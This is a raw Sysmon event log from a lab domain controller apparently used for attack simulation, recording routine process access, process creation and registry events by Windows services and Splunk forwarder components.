12:03:08.162{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:08.162{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64FC-6064-0F01-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64FC-6064-0F01-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.023{266CAFBE-64FC-6064-0F01-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64FD-6064-1101-00000000AE01}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:09.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64FD-6064-1101-00000000AE01}5448C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64FD-6064-1101-00000000AE01}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.644{266CAFBE-64FD-6064-1101-00000000AE01}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.456{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F73C9F614B5EAD90525848D93006EA60,SHA256=D1EBE1ECA826FA2728B461C9B9DC328596F3EE2C16679C5D78606E50E926A765,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.207{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB658915D1FEFE57BFC8B65F230A6206,SHA256=4487C0C022CF541C473FB4D338D970153C023D9C799BF38AD26F2584484FAAB3,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000008704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.191{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 
10341000x80000000000000008703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.175{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.175{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.175{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DA5FD7A16CFAE74BB2B8D42D5B636FE4,SHA256=A772FD14E1AE664BB225CCC180F3378FFBA0B873A281F26C347860D4F17C0CA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.175{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=028B3DA03588EBE3A545DC30C548B7C4,SHA256=B17614CF59B539AF554937B23A03A9556F0C8D57EA579C57DC6CF37F0CC3BCFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.160{266CAFBE-64FC-6064-1001-00000000AE01}66606664C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000008698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:09.113{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72625-0xd0e6900d) 10341000x80000000000000008731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:10.859{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:10.859{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:10.859{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.868{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} 
